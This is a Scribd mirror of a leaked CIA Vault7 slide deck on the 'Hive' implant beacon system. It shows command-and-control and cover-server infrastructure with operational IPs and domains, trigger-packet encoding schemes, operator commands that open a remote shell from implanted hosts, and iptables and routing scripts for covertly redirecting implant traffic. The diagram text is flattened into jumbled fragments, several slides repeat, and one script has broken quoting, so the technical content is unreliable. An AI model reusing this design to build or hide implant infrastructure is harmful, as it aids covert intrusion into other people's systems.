Scribd Logo
Upload

Welcome to Scribd!

  • Hive Operating Environment

    Uploaded by

    Casandra Edwards
    59 views16 pages
    CIA Vault7 Hive Operating Environment. Mirrored from Wikileaks. This document was created by an employee of the US Central Intelligence Agency as a part of his/her official duties. As such it is not elegible for copyright protection.

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    CIA Vault7 Hive Operating Environment. Mirrored from Wikileaks. This document was created by an employee of the US Central Intelligence Agency as a part of his/her official duties. As such it is not elegible for copyright protection.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    59 views16 pages

    Hive Operating Environment

    Uploaded by

    Casandra Edwards
    CIA Vault7 Hive Operating Environment. Mirrored from Wikileaks. This document was created by an employee of the US Central Intelligence Agency as a part of his/her official duties. As such it is not elegible for copyright protection.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 16

    SECRET//NOFORN

    Hive Beacon Infrastructure


    VPS Server
    Apache with
    Mod Proxy
    IPTABLES Forwarding

    Implanted
    Host

    Implanted
    Host

    Proxy / Cover
    VPN Server Server

    Implanted
    Host

    Log Files RIPPER


    Proxy /
    Honeycomb SNAPPER
    VPN Server
    One-way Database
    Implanted Transfer
    Host Blot 4.0

    DNS
    Server

    SSL Session
    OSN
    Implanted VPN Network
    Host Connections

    Linux-based Infrastructure

    1
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Servers
    IPTABLES Forwarding

    6 Cover domain: vhost1.edb.devlan.net

    tap010 tap011 Bridge: br1 Bridge: br2 172.16.64.10


    4 10.6.5.197
    1
    Implanted eth0 172.16.63.1 tap041
    Host 10.6.5.191 Cover
    Server tap040
    eth1
    10.6.5.190
    10.177.77.1 Cover Server Address Mapping
    172.16.64.11: vhost1
    172.16.64.1 172.16.64.12: vhost2
    tap032
    3 … ...
    VPN tunnels
    Blot
    eth1 eth2
    172.16.63.101
    Beastbox
    tap030
    tap031
    tap020 10.6.5.196
    eth1
    Implanted eth0
    Host 2
    10.6.5.192 tap021
    172.16.63.2 5
    Cover domain: vhost2.edb.devlan.net 10.2.4.119 Honeycomb
    Tool Handler

    VPS Proxy Port


    Redirection Map
    Inbound Redirected
    Command
    Post 80 8001
    443 44301

    Bridge: br0

    2
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Server
    IPTABLES Forwarding
    tap1 tap11
    172.16.63.1
    Bridge: br1 Bridge: br2
    172.16.64.10 4 10.6.5.197
    1
    Implanted eth0
    Host 10.6.5.191 tap41 Cover
    Server tap4
    eth1
    Target domain: vhost1.edb.devlan.net
    10.177.77.1 Cover Server Ports
    tap32 172.16.64.11: vhost1
    172.16.64.1 172.16.64.12: vhost2

    3 … ...
    VPN tunnels Blot
    eth1 eth2
    172.16.63.101
    Beastbox
    tap31
    tap2 tap21 10.6.5.196
    Implanted eth0
    Host 2 tap3
    10.6.5.192
    Target domain: vhost2.edb.devlan.net
    eth1
    172.16.63.2 Blot In-bound Ports 5
    10.2.4.119 Honeycomb
    8001: vhost1 44301: vhost1
    8002: vhost2 44302: vhost2 Tool Handler
    … ...

    3
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Server
    IPTABLES Forwarding
    tap1 tap11
    172.16.63.1
    Bridge: br1 Bridge: br2
    172.16.64.10 4 10.6.5.197
    1
    Implanted eth0
    Host 10.6.5.191 tap41 Cover
    Server tap4
    eth1
    Target domain: vhost1.edb.devlan.net
    10.177.77.1 Cover Server Ports
    tap32 172.16.64.11: vhost1
    172.16.64.1 172.16.64.12: vhost2

    3 … ...
    VPN tunnels Blot
    eth1 eth2
    172.16.63.101
    Beastbox
    tap31
    tap2 tap21 10.6.5.196
    Implanted eth0
    Host 2 tap3
    10.6.5.192
    Target domain: vhost2.edb.devlan.net
    eth1
    172.16.63.2 Blot In-bound Ports 5
    10.2.4.119 Honeycomb
    8001: vhost1 44301: vhost1
    8002: vhost2 44302: vhost2 Tool Handler
    … ...

    4
    SECRET//NOFORN
    TOP SECRET//SI//NOFORN

    Hive Beacon Operational Infrastructure


    VPS Servers
    IPTABLES Forwarding CentOS-5.6
    32-bit
    Target domain: playa-del-rio.com
    eth1
    Implanted eth0 78.47.85.121/28 172.24.5.141/23 Cover
    Host 78.47.85.114/28 Server
    eth1
    10.177.77.1
    CentOS-5.8
    CentOS-5.6
    64-bit
    32-bit

    VPN tunnels eth0 Blot eth1


    91.93.104.178/25 172.24.5.132/23
    Beastbox

    Gateway:78.47.131.65
    Implanted eth0
    Host 78.47.131.68/29 eth1 Gateway: 88.198.156.225
    88.198.156.226/29 Honeycomb
    Target domain: viva-rio-engracado.com 172.24.5.188/23 Tool Handler
    CentOS-5.8
    64-bit

    5
    TOP SECRET//SI//NOFORN
    TOP SECRET//SI//NOFORN

    Hive Beacon Operational Infrastructure


    VPS Servers
    IPTABLES Forwarding CentOS-5.6
    32-bit
    Target domain: playa-del-rio.com
    eth1
    Implanted eth0 78.47.85.121/28 172.24.5.141/23 Cover
    Host 78.47.85.114/28 Server
    eth1
    10.177.77.1
    CentOS-5.8
    CentOS-5.6
    64-bit
    32-bit

    VPN tunnels eth0 Blot eth1


    91.93.104.178/25 172.24.5.132/23
    Beastbox

    Gateway:78.47.131.65
    Implanted eth0
    Host 78.47.131.68/29 eth1 Gateway: 88.198.156.225
    88.198.156.226/29 Honeycomb
    Target domain: viva-rio-engracado.com 172.24.5.188/23 Tool Handler
    CentOS-5.8
    64-bit

    6
    TOP SECRET//SI//NOFORN
    SECRET//NOFORN

    SinnerTwin Deployment Environment

    7
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Operation
    hived hclient / cutthroat
    SSL Session
    GENESIS
    Implanted
    ICON
    Host
    Workstation
    Listening port
    TriggerListen $ ./cutthroat ./hive
    Trigger
    > ilm connect <target IP>
    fork_process P C
    start_triggered_connect
    TriggerCallbackSession Call-back

    StartClientSession
    P C shell open > shell open <client IP> <client port> <pw>
    launchShell
    shell

    8
    SECRET//NOFORN
    SECRET//NOFORN
    Raw TCP/UDP Trigger

    Hive 2.5 Algorithm

    400 Bytes
    0 8 92
    8-bytes CRC 1-byte Encoded
    Random Data of length 12-byte Integer 25-byte 2-
    Random Random CRC XOR 12-byte Random Data
    CRC % 200 PAD N x 127 PAD byte
    Data Data value Trigger
    PAD

    The twelve byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger and the remaining trigger bytes or XORed with 0xB6.

    Hive 2.6 Algorithm

    126 Bytes Minimum / 472 Bytes Maximum


    0 8 92
    8-bytes CRC Encoded
    Random Data of length Integer 8-byte 8-byte Random Data of length
    Random Random CRC 12-byte
    CRC % 200 N x 127 PAD1 PAD2 CRC % 146
    Data Data Trigger

    The twelve byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes
    with the corresponding byte of the twelve-byte trigger payload.

    9
    SECRET//NOFORN
    Scrap slides follow

    10
    SECRET//SI//NOFORN

    Hive Beacon Lab Test Infrastructure


    Implanted Hosts VPS Servers Proxy / Director Response Servers

    eth0
    Implanted 10.2.5.5
    Host 00:0C:42:99:8A:E1
    PowerPC
    eth0 VLAN 65
    Implanted 10.2.5.6
    Host 00:0C:42:4D:7B:DE
    CentOS-6.2
    MIPSBE 64-bit
    Target domain: domainA.com tun0
    eth0 10.177.77.10 eth1 eth0
    Implanted
    Host
    10.6.5.190 172.16.64.10 Cover 10.6.5.197
    52:54:00:9A:B0:72
    x86 eth0
    eth1 Server
    172.16.63.1/24 CentOS-5.9
    10.6.5.191/24
    eri0 CentOS-6.3 32-bit
    Implanted 10.2.5.5
    Host 64-bit
    sparc
    00:03:BA:86:6A:78
    eth1 Blot
    172.16.63.101
    VPN tunnels Beastbox VLAN 65
    eth2
    172.16.64.1
    eth0
    tun0 10.6.5.196
    10.177.77.1
    Implanted
    Host eth0 eth1 eth1 eth0
    10.6.5.192/24 172.16.63.2/24
    VLAN 65
    172.16.64.100 Honeycomb 10.6.5.198
    Target domain: domainB.com Tool Handler
    CentOS-6.2
    64-bit CentOS-6.2
    64-bit

    Bridge: hive1 Bridge: hive2


    eth0
    Command 10.6.5.195/24
    VLAN 65
    Post

    11
    SECRET//SI//NOFORN
    SECRET//SI//NOFORN

    Hive Test Infrastructure


    Implanted Hosts VPS Servers Proxy / Director Response Servers

    eth0
    Implanted 10.2.5.5
    Host 00:0C:42:99:8A:E1
    PowerPC
    eth0 VLAN 65
    Implanted 10.2.5.6
    Host CentOS-6.2
    00:0C:42:4D:7B:DE
    MIPSBE 64-bit
    Target domain: domainA.com tun0
    eth0 10.177.77.a eth1 eth0
    Implanted
    Host
    10.6.5.190 172.16.64.10 Cover 10.6.5.197
    x86
    52:54:00:9A:B0:72
    eth0
    eth1 eth1:1 .11 Server
    172.16.63.1/24 CentOS-5.9 eth1:2 .12
    10.6.5.191/24
    eri0 CentOS-6.3 32-bit
    Implanted 10.2.5.5 eth1
    Host 64-bit 172.16.63.101
    eth2
    sparc
    00:03:BA:86:6A:78 Blot
    172.16.64.1
    VPN tunnels eth1:1
    172.16.63.102 Beastbox VLAN 65
    tun0
    10.177.77.b
    eth0
    tun0 10.6.5.196
    eth0 10.177.77.1
    Implanted 10.6.5.193
    Host 52:54:00:95:DA:16 eth0 eth1 eth1 eth0
    10.6.5.192/24 172.16.63.2/24
    VLAN 65
    172.16.64.100 Honeycomb 10.6.5.198
    Target domain: domainB.com Tool Handler
    CentOS-6.2
    64-bit CentOS-6.2
    64-bit

    Bridge: hive1 Bridge: hive2


    eth0
    Command 10.6.5.195/24
    VLAN 65
    Post

    12
    SECRET//SI//NOFORN
    SECRET//SI//NOFORN

    New Hive Test Infrastructure


    Implanted Hosts VPS Servers Proxy / Director Response Servers

    eth0
    Implanted 10.2.5.5
    Host 00:0C:42:99:8A:E1
    PowerPC
    eth0 VLAN 65
    Implanted 10.2.5.6
    Host CentOS-6.2
    00:0C:42:4D:7B:DE
    MIPSBE 64-bit
    Target domain: domainA.com
    eri0 eth1 eth0
    Implanted 10.2.5.5 172.16.64.10 10.6.5.197
    Host 00:03:BA:86:6A:78
    Cover Server
    sparc eth1 domainA.com eth1:1 .11
    eth0 172.16.63.1/24 CentOS-6.4 domainB.com eth1:2 .12
    10.6.5.191/24
    CentOS-6.3 64-bit
    64-bit eth1
    eth2
    172.16.63.111
    eth0 172.16.64.2
    Implanted 10.6.5.190 Nginx Proxy
    SSL eth1:1
    implant1 Host 52:54:00:9A:B0:72
    172.16.63.112
    VLAN 65
    x86
    eth0
    10.6.5.189
    eth0
    implant2
    Implanted 10.6.5.193
    Host 52:54:00:95:DA:16 eth0 eth1 eth1
    10.6.5.192/24 172.16.63.2/24
    VLAN 65
    172.16.64.100 Honeycomb
    Target domain: domainB.com domainA.com eth1:1 .101 Tool Handler eth0
    domainB.com eth1:2 .102 10.6.5.198
    CentOS-6.2
    64-bit CentOS-6.2
    64-bit

    Bridge: hive1 Bridge: hive2


    eth0
    Command 10.6.5.195/24 #!/bin/bash
    VLAN 65
    Post # Script to configure policy routing

    echo -en “101\thiveA >> /etc/iproute2/rt_tables


    echo -en “102\thiveB >> /etc/iproute2/rt_tables
    ip route add default via 172.16.63.2 table hiveA
    ip route add default via 172.16.63.2 table hiveB
    ip rule add from 172.16.63.111 table hiveA prio 1
    ip rule add from 172.16.63.112 table hiveB prio 1

    13
    SECRET//SI//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Server
    IPTABLES Forwarding

    Implanted eth0 172.16.63.1


    Host 10.3.2.174
    p3p2
    Target domain: vhost1.edb.devlan.net

    172.16.64.10 10.3.2.113
    Cover
    172.16.64.1 Server
    Blot Proxy
    172.16.63.101 with:
    VPN Server
    Apache Server
    10.3.2.125
    Honeycomb
    Implanted Tool Handler
    10.2.4.119
    Host 10.3.2.185 172.16.63.131
    Target domain: vhost2.edb.devlan.net

    VPS Server IPTABLES Configuration


    iptables -P INPUT DROP
    iptables -P FORWARD DROP
    iptables -p OUTPUT DROP
    iptables -A INPUT -p tcp --dport 22 -j ACCEPT
    iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
    DNAT
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443
    FORWARDING
    iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT
    SNAT
    iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
    14
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Server
    IPTABLES Forwarding
    tap1 tap11 Bridge: br1 Bridge: br2
    Implanted eth0 172.16.63.1
    Host 10.6.5.191
    eth1
    Target domain: vhost1.edb.devlan.net

    172.16.64.10 10.6.5.197
    tap32 Cover
    172.16.64.1 tap41 Server tap4
    Blot Proxy
    172.16.63.101 with:
    VPN Server
    Apache Server
    tap31 10.6.5.196
    tap2 tap21
    tap3 Honeycomb
    Implanted eth0 Tool Handler
    eth1 10.2.4.119
    Host 10.6.5.192
    172.16.63.2
    Target domain: vhost2.edb.devlan.net

    VPS Server IPTABLES Configuration


    iptables -P INPUT DROP
    iptables -P FORWARD DROP
    iptables -p OUTPUT DROP
    iptables -A INPUT -p tcp --dport 22 -j ACCEPT
    iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
    DNAT
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443
    iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443
    FORWARDING
    iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT
    iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT
    SNAT
    iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
    15
    SECRET//NOFORN
    SECRET//NOFORN

    Hive Beacon Test Infrastructure


    VPS Server
    IPTABLES Forwarding
    tap1 tap11 Bridge: br1 Bridge: br2
    eth0 172.16.63.1 172.16.64.10 10.6.5.197
    Implanted Cover
    Host 10.6.5.191 tap41
    eth1
    Server tap4
    Target domain: vhost1.edb.devlan.net
    tap32 Cover Server Ports
    172.16.64.1 172.16.64.11: vhost1
    172.16.64.12: vhost2
    … ...
    Blot Proxy
    172.16.63.101 with:
    VPN Server
    Apache Server
    tap31
    tap2 tap21 10.6.5.196
    Implanted eth0 Blot In-bound Ports
    eth1 tap3
    Host 10.6.5.192 8001: vhost1 44301: vhost1
    172.16.63.2 8002: vhost2 44302: vhost2
    Target domain: vhost2.edb.devlan.net … ... Honeycomb
    10.2.4.119 Tool Handler

    16
    SECRET//NOFORN

    You might also like